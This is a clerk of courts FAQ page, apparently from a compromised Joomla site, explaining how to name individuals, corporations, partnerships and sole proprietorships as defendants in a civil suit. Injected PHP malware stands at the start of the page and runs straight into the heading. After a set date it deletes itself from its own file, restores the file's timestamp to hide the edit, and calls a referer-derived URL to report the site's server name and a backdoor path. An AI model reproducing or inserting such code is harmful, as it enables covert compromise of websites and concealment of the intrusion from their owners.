check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456736233){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } Who do I name as the party to my suit?
Home County Civil Division Frequently Asked Questions Who do I name as the party to my suit?

More... Quick Links

Who do I name as the party to my suit?

The Plaintiff must name the proper party as a Defendant. If the Defendant:

  • is an individual, the Plaintiff should determine the person's full legal name and any
    aliases prior to filing the lawsuit.
  • is a business, the Plaintiff must determine if the business is a corporation, a
    partnership or a sole proprietorship. The corporate status of any corporation
    legitimately doing business in the State of Florida can be determined by contacting
    the Florida Department of State, Division of Corporations.

If the business is:

  • a corporation, the corporation should be named as a Defendant, NOT its officers.
  • either a partnership or a sole proprietorship, the entity AND the individuals should
    be named as Defendants.
Copyright © 2018 Clerk of Courts. All Rights Reserved.
Joomla! is Free Software released under the GNU/GPL License.
To protect your privacy, please read the Putnam County Email Privacy Policy.

Information on this website does not constitute the Official Court Records maintained by the Clerk.